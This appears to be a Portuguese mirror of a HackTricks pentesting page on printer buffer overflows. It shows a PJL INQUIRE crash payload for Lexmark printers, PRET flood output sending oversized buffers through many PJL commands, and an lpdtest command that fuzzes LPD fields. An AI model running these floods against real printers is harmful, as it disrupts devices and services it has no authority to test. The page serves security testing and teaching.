mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 13:43:24 +00:00
74 lines
5.4 KiB
Markdown
74 lines
5.4 KiB
Markdown
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
|
|
# PJL
|
|
|
|
Várias impressoras a laser _Lexmark_ travam quando recebem cerca de 1.000 caracteres como argumento INQUIRE (veja [CVE-2010-0619](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619)) e enviar cerca de 3.000 caracteres como argumento SET para a impressora _Dell 1720n_ trava o dispositivo:
|
|
```
|
|
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
|
|
```
|
|
Você pode verificar Buffer Overflows usando [**PRET**](https://github.com/RUB-NDS/PRET):
|
|
```bash
|
|
./pret.py -q printer pjl
|
|
Connection to printer established
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
printer:/> flood
|
|
Buffer size: 10000, Sending: @PJL SET [buffer]
|
|
Buffer size: 10000, Sending: @PJL [buffer]
|
|
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
|
|
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
|
|
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL INFO [buffer]
|
|
Buffer size: 10000, Sending: @PJL ECHO [buffer]
|
|
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
|
|
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
|
|
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
|
|
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
|
|
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
|
|
```
|
|
# Daemon LPD
|
|
|
|
Ele permite múltiplos vetores definidos pelo usuário, como _jobname, username ou hostname_, que podem **não estar suficientemente protegidos**. Já foram descobertas várias vulnerabilidades relacionadas a esse mau funcionamento.
|
|
|
|
Um simples **fuzzer LPD** para testar buffer overflows pode ser criado usando a ferramenta `lpdtest` **incluída** no [PRET](https://github.com/RUB-NDS/PRET). O argumento `in` define todas as entradas do usuário definidas pelo protocolo LPD para um determinado valor (neste caso, a saída do Python):
|
|
```bash
|
|
./lpdtest.py printer in "`python -c 'print "x"*150'`"
|
|
```
|
|
Você pode encontrar mais informações sobre esses ataques em [http://hacking-printers.net/wiki/index.php/Buffer\_overflows](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)
|
|
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|